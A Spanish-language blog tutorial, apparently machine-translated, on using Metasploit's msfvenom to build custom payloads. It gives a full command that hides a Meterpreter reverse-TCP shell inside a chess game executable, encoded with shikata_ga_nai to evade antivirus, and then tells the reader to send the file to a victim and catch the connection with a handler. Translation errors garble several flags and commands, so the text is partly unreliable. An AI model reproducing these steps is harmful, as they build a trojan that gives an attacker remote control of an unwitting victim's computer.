Usando msfvenom para crear payloads personalizados

Usando msfvenom para crear payloads personalizados - Codelivly

A veces es posible que deseemos crear una carga útil personalizada (para obtener más información sobre las cargas útiles de Metasploit, consulte Conceptos básicos de Metasploit, Parte 3: Cargas útiles). Por ejemplo, es posible que deseemos incrustar una carga/escucha en una aplicación u otro malware en el que esperamos que el objetivo haga clic y podamos tomar el control de su computadora. Esto es exactamente para lo que está diseñado msfvenom.​

Anteriormente, para volver a codificar una carga útil en Metasploit, tenía que canalizar (|) msfpayload a través de msfencode para crear una carga útil personalizada. En 2015, Rapid7, los desarrolladores de Metasploit, introdujeron un nuevo comando que reemplaza la torpe combinación de msfpayload y msfencode para agilizar el proceso de volver a codificar una carga útil de Metasploit. Este nuevo comando estandariza nuestras opciones de línea de comandos y mejora la velocidad.

Echemos un vistazo a msfvenom en nuestra guía básica de Metasploit aquí.

Una nota rápida sobre la recodificación de cargas útiles

La recodificación de una carga útil de Metasploit a menudo se ha promocionado como una forma de evadir AV y otros dispositivos de seguridad, pero las personas que desarrollan software AV no son estúpidas. Ahora han encontrado formas de detectar incluso una carga útil recodificada de Metasploit.

Ahora, en lugar de solo buscar la firma de la carga útil que codificaste, solo buscan la firma de la plantilla que Metasploit usa para volver a codificar (estas plantillas están en usr/share/metasploit-framework/data/templates) . De esa forma, no importa cuántos esquemas de codificación diferentes utilice, el esquema tiene una firma y el software antivirus lo detecta.

Sin embargo, no se preocupe, todavía hay formas de volver a codificar una carga útil que aún no pueden ser detectadas por el software antivirus. Echa un vistazo a mi serie sobre Evadir AV con;

(1) OWASP-ZSC

(2) desgranadora

(3) Vela-Escape

Paso 1: Inicie Kali e inicie Metasploit

Comencemos por encender Kali y abrir el msfconsole. Puede hacer esto simplemente escribiendo "msfconsole”, o puede usar la GUI y acceder Aplicaciones -> Kali Linux -> Las 10 mejores herramientas de seguridad -> Metasploit Framework.

kali>msfconsola

Cuando lo haga, se encontrará en este caparazón interactivo de Metasploit.

​​​​​​​​

Paso 2: Ver las opciones de msfvenom

Ahora, en el indicador, escriba "msfvenom" para abrir su página de ayuda (también puede usar el interruptor -h para obtener la misma pantalla).

msf > msf veneno

​​​​​​​​​​​​​​​​​​​

Echemos un vistazo a algunas de las opciones más importantes de esta lista.

  • -pag denota la carga útil de Metasploit que queremos usar
  • -mi designa el encoder que queremos usar
  • -A denota la arquitectura que queremos usar (por defecto x86)
  • -s denota el tamaño máximo de la carga útil
  • -I es el número de iteraciones con las que codificar la carga útil
  • -X designa un archivo ejecutable personalizado para usar como plantilla

Paso 3: lista de codificadores

Los codificadores son los diferentes algoritmos y esquemas de codificación que Metasploit puede usar para volver a codificar las cargas útiles. De esta manera podemos ofuscar la intención de la carga útil. Metasploit tiene muchos esquemas de codificación y podemos verlos escribiendo:

msf > msfvenom -l codificadores

Metasploit luego enumerará todos los codificadores disponibles con el rango y la descripción de cada uno.

rodeé el shikata_ga_nai el codificador y tenga en cuenta que skikata_ga_nai está calificado como "excelente". "Shikata ga nai" es una fase de la cultura japonesa que se traduce vagamente como "no se puede hacer nada al respecto". ¡Este es el tipo de codificador que quiero usar!

​​​​

​Paso 4: Opciones de plataforma

En la terminología de msfvenom, una plataforma es vagamente un sistema operativo o un lenguaje de secuencias de comandos con algunas excepciones, como netware. Al crear nuestra carga útil personalizada, debemos crearla específicamente para el sistema operativo de destino. Podemos ver una lista de todas las posibles plataformas de destino escribiendo;

msf5 > plataformas msfvenom -l

Tenga en cuenta que casi todos los sistemas operativos están representados aquí, desde AIX a Android a Linux a OSX a Windows y casi todo lo demás en el medio. Mientras construimos nuestra carga útil personalizada, debemos seleccionar la plataforma de destino adecuada para tener éxito.

Cuando construimos nuestra carga útil personalizada, podemos usar el -plataforma sintaxis para designar nuestra plataforma de destino.

​Paso 5: Formatos

A continuación, veamos los formatos que puede tomar nuestra carga útil. Podemos enumerarlos escribiendo;

msf > msfvenom -l formatos

Como puede ver, estos son formatos ejecutables. Si nos desplazamos un poco hacia abajo, podemos ver los formatos de transformación.

Cuando construimos nuestra carga útil personalizada, usaremos el interruptor -f y especifique el formato.

​​​​

Paso 6: Ver opciones de carga útil

Podemos usar msfvenom para verificar las opciones que necesitamos configurar para cualquier carga similar a "mostrar opciones" en la consola de Metasploit. El comando para verificar las opciones de cualquier carga útil es:

msf > msfveneno -p –opciones de carga útil

Entonces, si queremos verificar las opciones de carga útil para el carga útil de windows/meterpreter/reverse_tcpSólo tipo:

msf >msfvenom -p windows/meterpreter/reverse_tcp –opciones de carga útil

Cuando lo hacemos, Metasploit responde de la siguiente manera.

​​​​​​​​​​​​​​

Ahora, si queremos trabajar con esta carga útil, sabemos qué opciones debemos configurar en el comando msfvenom. En este caso, podemos aceptar todos los valores predeterminados, pero debemos configurar EL ANFITRIÓN.

Paso 7: cree un ejecutable de Windows personalizado

Ahora vamos a crear un ejecutable de Windows personalizado con una plantilla personalizada. Aunque podemos crear una carga útil sin una plantilla personalizada, tenemos más posibilidades de eludir las funciones de seguridad y AV si usamos una plantilla personalizada. En este caso usaremos un juego de ajedrez llamado "chess.exe". La idea aquí es que incrustaremos la carga útil de meterpreter dentro el juego de ajedrez, luego, cuando la víctima abre el juego para jugar al ajedrez, inicia sesión en meterpreter en su computadora e inicia sesión en nuestro sistema.

Coloqué el juego de ajedrez en el /usr/compartir directorio en mi sistema Kali.

Para crear un ejecutable malicioso con el ventanas/meterpreter/reverse_tcp incrustado dentro, simplemente escribimos:

msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -x /usr/share/ajedrez.exe -e x86/shikata_ga_nai -i 200 -f exe > ajedrez.exe

​​​​​​​

O :

  • -p /windows/meterpreter/reverse_tcp designa la carga útil que queremos embarcar
  • EL ANFITRIÓN designa al anfitrión local
  • LPORT designa el puerto en el que queremos escuchar
  • -X denota la plantilla que queremos usar y la ruta a ella
  • -e x86/shikata_ga_nai designa el encoder que queremos usar
  • yo 200 representa el número de iteraciones
  • -f exe indica que queremos crear un ejecutable (.exe)
  • ajedrez.exe designa el nombre del archivo a crear

Tenga en cuenta que en la captura de pantalla anterior, rodeé con un círculo la salida que dice "No se seleccionó ningún arco". msfvenom tiene como valor predeterminado x86, por lo que si queremos crear una carga x86, no necesitamos agregar nada adicional. Por supuesto, si quisiéramos crear una carga útil x64, tendríamos que agregar "-un x64a nuestro mando.

Ahora necesitamos enviar el archivo chess.exe al objetivo.

Cuando la víctima haga clic en el archivo chess.exe, la carga útil de meterpreter se activará y buscará establecer una conexión con su sistema (LHOST).

Para que la conexión tenga éxito, deberá abrir el administrador múltiple en Metasploit para recibir la conexión.

msf > usar exploit/multi/manager msf > establecer ventanas de carga útil/meterpreter/reverse_tcp

Conclusión

Este nuevo comando en Metasploit, msfvenom, puede agilizar el proceso de recodificación e integración de cargas útiles. Es excelente para integrar cargas útiles en varios software, pero ya no se garantiza que supere al software antivirus.

Si quieres conocer otros artículos parecidos a Usando msfvenom para crear payloads personalizados puedes visitar la categoría Tutoriales.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Subir

Esta página web utiliza cookies para analizar de forma anónima y estadística el uso que haces de la web, mejorar los contenidos y tu experiencia de navegación. Para más información accede a la Política de Cookies . Ver mas